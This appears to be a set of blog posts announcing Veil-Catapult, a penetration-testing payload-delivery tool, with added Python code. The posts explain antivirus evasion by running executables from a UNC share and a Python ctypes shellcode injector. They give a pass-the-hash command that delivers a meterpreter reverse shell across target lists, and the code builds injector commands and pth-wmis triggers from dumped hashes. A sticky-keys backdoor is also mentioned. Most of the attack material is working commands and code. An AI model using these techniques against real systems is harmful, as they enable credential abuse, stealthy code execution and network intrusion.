Bypassing On-disk Detection With Veil-Catapult

Say you’re on an internal pentest for a client, and the backdoor .exe you’ve been using has suddenly been snatched up by some antivirus solution. You’re short on time, you haven’t heard of Veil-Evasion, and you really need access. Are you toast, or is there some other option?

There still might be hope. One of the techniques released with Veil-Catapult at Shmoocon 2014 is the host-and-UNC-invoke approach. Choose the [h]ost method when prompted and enter your local IP (tab-completable) so the target machines know where to reach back to:

[Screenshot: catapult_host_launch]

We use the Impacket library to throw up a temporary SMB server on the attacker box that hosts the .EXE, and then issue a pth-wmis or pth-winexe command that runs the payload through a \\UNC path pointing back at that share. The target's loader maps the executable straight from the remote share, so nothing is written to the target's disk, which lets otherwise disk-detectable executables slip past on-disk scanning. Keep in mind that the binary still crosses the wire in the clear over SMB, and (as the note below shows) a product that inspects images as they are mapped can still catch it:

[Screenshot: catapult_host_execute]

One interesting note we discovered when working with this technique: UNC invocation gets some otherwise disk-detectable executables past some solutions, but not all. Microsoft Security Essentials still detects a stock msfvenom-generated executable when it is run in memory via host/execute, yet it lets other disk-detectable payloads (like c/shellcode_inject/void) run the same way without complaint:

[Screenshot: mse]

More evidence that AV vendors are signaturing the output of well-known pentesting tools rather than doing proper behavioral detection.

#avlol :)

Barebones Python Injection

We love PowerShell. It's awesome for payload delivery for a myriad of reasons: trusted execution, AV-bypassing abilities, reputation filter bypass, full .NET capabilities, etc. However, on assessments we still sometimes encounter machines without PowerShell installed or enabled. Wouldn't it be nice to have a way to invoke payloads without PowerShell that still granted trusted execution and the other nice features we get with that approach?

The Barebones Python injector released with Veil-Catapult addresses this problem. If you don't have PowerShell access on a system for some reason, don't really like dropping malicious EXEs to disk, or nasty AV whitelisting/reputation filters are causing you pain, this method gives you an alternative for owning boxes with a trusted execution model.

To execute, a zipped 'barebones' Python environment is first uploaded to the victim machine's temp directory using Impacket, along with a standalone 7-Zip binary. This environment was stripped by hand to only the bare minimum libraries needed to invoke shellcode through Python ctypes. A pth-wmis or pth-winexe command is used to unzip the environment, and a second command invokes the extracted Python binary with the "-c" option. The passed string is a minimal Python program that base64-decodes a shellcode string and invokes it in memory:

python.exe -c "from ctypes import *; a='u/Fp...'.decode('base_64');cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()"

The end result? The only files that touch disk are known/trusted Python libraries and the interpreter, and your Veil-Evasion generated shellcode is invoked without a malicious executable potentially being snarfed up by AV. The shellcode does, however, travel in the command line of python.exe, so it is visible in the process list and in any process-creation logging the target has enabled.
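To make the staging concrete, here is an added example (not Veil-Catapult's own code) that builds the two target-side commands described above from raw shellcode bytes: the 7-Zip extraction and the python.exe -c stub. It assumes the environment was uploaded as C:\Windows\Temp\python.zip next to a standalone 7za.exe (assumed names and paths), that the extracted interpreter is Python 2 (hence the 'base_64' codec, as in the post), and it uses a constructed placeholder in place of real shellcode. It also shows the check a practitioner wants before firing: the base64 blob must round-trip, and the whole thing must fit in a Win32 command line.

```python
"""Build the Barebones Python injector command lines (added illustration).

Assumptions (not from the original post):
  * environment uploaded as C:\\Windows\\Temp\\python.zip beside 7za.exe;
  * extracted interpreter is Python 2, so the target-side stub uses the
    Python 2 'base_64' codec exactly as the post's one-liner does.
SAMPLE_SHELLCODE is a constructed stand-in, not a real stager.
"""
import base64

TEMP_DIR = r"C:\Windows\Temp"   # assumed upload location
# Hard limit for a Win32 command line (CreateProcess / Win32_Process.Create).
MAX_CMDLINE = 32767

# Constructed placeholder: a NOP sled ending in INT3.
SAMPLE_SHELLCODE = b"\x90" * 16 + b"\xcc"


def unzip_command(temp_dir=TEMP_DIR):
    """First pth-wmis/pth-winexe command: extract the barebones environment
    into <temp_dir>\\python with the standalone 7-Zip binary."""
    return f"{temp_dir}\\7za.exe x -y -o{temp_dir}\\python {temp_dir}\\python.zip"


def stub_command(shellcode, temp_dir=TEMP_DIR):
    """Second command: run the extracted python.exe with a -c program that
    base64-decodes the shellcode and calls it through ctypes."""
    b64 = base64.b64encode(shellcode).decode("ascii")
    # Standard base64 never contains a double quote, so the -c argument can
    # be wrapped in double quotes and the Python string in single quotes.
    program = (
        "from ctypes import *;"
        f"a='{b64}'.decode('base_64');"
        "cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()"
    )
    cmd = f'{temp_dir}\\python\\python.exe -c "{program}"'
    if len(cmd) > MAX_CMDLINE:
        raise ValueError("shellcode too large to pass on the command line")
    return cmd


def recover_shellcode(cmd):
    """Operator-side sanity check: pull the base64 blob back out of a
    generated command and decode it, so a quoting mistake is caught before
    anything is sent to a target."""
    start = cmd.index("a='") + 3
    end = cmd.index("'", start)
    return base64.b64decode(cmd[start:end])


if __name__ == "__main__":
    print(unzip_command())
    print(stub_command(SAMPLE_SHELLCODE))
```

Both strings are what you would hand to pth-wmis or pth-winexe as the command to run on the target; the size check matters because base64 inflates the payload by a third and the entire stub has to fit in one command line.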


Veil-Catapult

Delivering a payload when Metasploit's psexec and its stock .exe templates fail is a common problem for penetration testers. A while back Attack Research released a great post entitled "psexec fail? upload and exec instead", which detailed how to upload and execute specified payloads. The excellent tool SMBexec can accomplish the same goal, utilizing a patched version of Samba to upload .exe's and trigger them. These options are great, but we wanted to build something that utilized the Veil framework for payload generation and filled in a few of the gaps we felt were missing.

We’d like to announce the newest addition to the Veil-Framework, our payload delivery tool Veil-Catapult. Utilizing the Impacket library from Core Labs and the passing-the-hash toolkit, as well as the full functionality of Veil-Evasion, Veil-Catapult meets all of your AV-evading payload delivery needs:

[Screenshot: catapult_main_menu]

EXE delivery features seamless integration with Veil-Evasion. If you don’t want to specify a custom executable, you can drop right into the Veil-Evasion generation menu and build a payload on the fly. Since this directly invokes the existing payload codebase, you have access to all the latest methods and modules as they’re released. After you’ve specified your options and built an executable, you’re dropped right back into the Veil-Catapult menu for target information. Single IPs or target lists can be specified, a domain can optionally be specified, and credentials can use hashes as well as normal passwords:

[Screenshot: catapult_exe_menu]

Triggering utilizes the passing-the-hash toolkit, specifically pth-wmis and pth-winexe. pth-wmis starts the process through WMI without installing a service, so it runs in the context of the account you authenticate as; pth-winexe installs a service on the target and so runs as SYSTEM, at the cost of leaving a service-creation artifact behind. Which to choose is situation dependent. Payloads can either be uploaded and triggered on a victim, or hosted on a temporary Impacket SMB server on your attacker box and triggered via \\UNC paths. A nice side effect of UNC triggering is that some otherwise disk-detectable .exe's will get right by a lot of antivirus : )

Note: Python PyInstaller payloads can't be hosted and MUST be uploaded in order to work properly.

[Screenshot: catapult_host_execute]

Standalone payloads offer some tried and true methods as well as a slightly new approach. PowerShell can be invoked using the standard command-line shellcode-injecting payload generated by Veil-Evasion, and the sticky keys (sethc) backdoor can be triggered as well, both with the same wmis or winexe options.

The Barebones python injector is a neat approach which we’ll be talking about in detail in an upcoming blog post. But feel free to check it out now : )

Cleanup functionality has also been incorporated. Whenever an exe is uploaded or hosted and then triggered on a host, cleanup instructions are written out to a resource file. Calling ./Veil-Catapult.py -r CLEANUP_FILE will first kill all associated processes on popped hosts, and then delete any uploaded binaries. The sethc backdoor also generates a cleanup script.

[Screenshot: catapult_cleanup]

And of course, we have command line flags for every option. Try ./Veil-Catapult.py -h for all the details:

[Screenshot: catapult_flags]

The following example takes an IP list and a hashdump/pwdump formatted cred file containing an admin hash, uses pth-wmis for triggering, builds an .exe with Veil-Evasion from the c/shellcode_inject/void payload and the given MSF parameters, hosts the executable on your IP and triggers it by UNC path, and doesn't confirm before launching:

./Veil-Catapult.py -tL ips.txt -cF d.txt --wmis -p c/shellcode_inject/void --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=172.16.199.236 LPORT=4444 --act hostexec --lip 172.16.199.236 -nc

  • -tL : provides a list of IPs to target
  • -cF : provides a pwdump file that Veil-Catapult extracts the admin account out of
  • --wmis : specifies that pth-wmis is to be used for triggering
  • -p ... : specifies the Veil-Evasion payload to be used
  • --msfpayload : the Metasploit shellcode to be used by the Veil-Evasion payload
  • --msfoptions : additional configuration details for the Metasploit payload
  • --act hostexec : instructs Veil-Catapult to host the payload and execute it by \\UNC path
  • --lip : the local IP needed for UNC invocation
  • -nc : don't confirm before firing off the attack
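As an added illustration of what the -cF / --act hostexec combination above boils down to (this is not Veil-Catapult's own code), the following Python parses a pwdump-formatted credential file, picks the RID-500 administrator, and assembles one pth-wmis (or pth-winexe) trigger per target that runs the hosted payload by \\UNC path. It assumes pth-toolkit's -U 'user%LM:NT' credential syntax and //IP target form, an attacker-side share named 'share' holding 'payload.exe' (assumed names), and uses constructed pwdump lines and IPs as sample input.

```python
"""Turn a pwdump file plus a target list into hostexec trigger commands.

Added illustration, not Veil-Catapult's own code. Assumptions:
  * credential file is hashdump/pwdump formatted (user:rid:LM:NT:::) and
    the admin account is the RID-500 entry;
  * pth-wmis / pth-winexe accept -U 'user%LM:NT' and //IP (pth-toolkit);
  * the temporary Impacket share is named 'share' and holds 'payload.exe'.
All sample data below is constructed.
"""

# Constructed sample pwdump output (empty LM hash, arbitrary NT hashes).
SAMPLE_PWDUMP = """\
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
svc_backup:1104:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
"""
SAMPLE_TARGETS = "10.0.0.5\n10.0.0.6\n"   # constructed target list


def is_hex32(s):
    """An LM or NT hash is exactly 32 hex characters."""
    return len(s) == 32 and all(c in "0123456789abcdefABCDEF" for c in s)


def parse_pwdump(text):
    """Return (user, rid, lm, nt) tuples; skip blank, short or malformed lines
    so a stray header or comment in the file does not become a credential."""
    creds = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        user, rid, lm, nt = parts[:4]
        if not (is_hex32(lm) and is_hex32(nt)):
            continue
        creds.append((user, int(rid), lm.lower(), nt.lower()))
    return creds


def pick_admin(creds):
    """The built-in administrator is always RID 500, regardless of its name."""
    for user, rid, lm, nt in creds:
        if rid == 500:
            return user, lm, nt
    raise ValueError("no RID-500 account in credential file")


def pth_credential(user, lm, nt, domain=None):
    """pth-toolkit credential string: [DOMAIN/]user%LM:NT."""
    acct = f"{domain}/{user}" if domain else user
    return f"{acct}%{lm}:{nt}"


def unc_payload_path(local_ip, share="share", exe="payload.exe"):
    """UNC path the target will load the hosted executable from."""
    return f"\\\\{local_ip}\\{share}\\{exe}"


def trigger_command(tool, target, cred, unc_path):
    """One pth-wmis / pth-winexe invocation against a single target."""
    if tool not in ("pth-wmis", "pth-winexe"):
        raise ValueError("tool must be pth-wmis or pth-winexe")
    return f"{tool} -U '{cred}' //{target} '{unc_path}'"


def build_hostexec_plan(pwdump_text, target_text, local_ip,
                        tool="pth-wmis", domain=None):
    """Mirror of '-cF file -tL list --act hostexec --lip IP': one trigger
    command per target, all using the extracted admin hash."""
    user, lm, nt = pick_admin(parse_pwdump(pwdump_text))
    cred = pth_credential(user, lm, nt, domain)
    unc = unc_payload_path(local_ip)
    return [trigger_command(tool, t, cred, unc) for t in target_text.split()]


if __name__ == "__main__":
    for cmd in build_hostexec_plan(SAMPLE_PWDUMP, SAMPLE_TARGETS, "172.16.199.236"):
        print(cmd)
```

Switching `tool` to "pth-winexe" changes only the front of each command; the credential, target and UNC path are identical, which is why the page treats the two triggers as interchangeable options behind the same --act.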

Veil-Catapult's introduction marks our long-intended goal of expanding the Veil-Framework beyond just AV evasion. We've moved our original Veil repository to https://github.com/Veil-Framework/Veil-Evasion/ and established a new repository for Veil-Catapult at https://github.com/Veil-Framework/Veil-Catapult/ . A superproject will be maintained at https://github.com/Veil-Framework/Veil/ that pulls in each tool in the Veil-Framework. We recommend that most users pull down the superproject to make sure everything works correctly together. If you choose to run the tools from different locations, be sure to edit /etc/veil/settings.py as appropriate if anything happens to malfunction.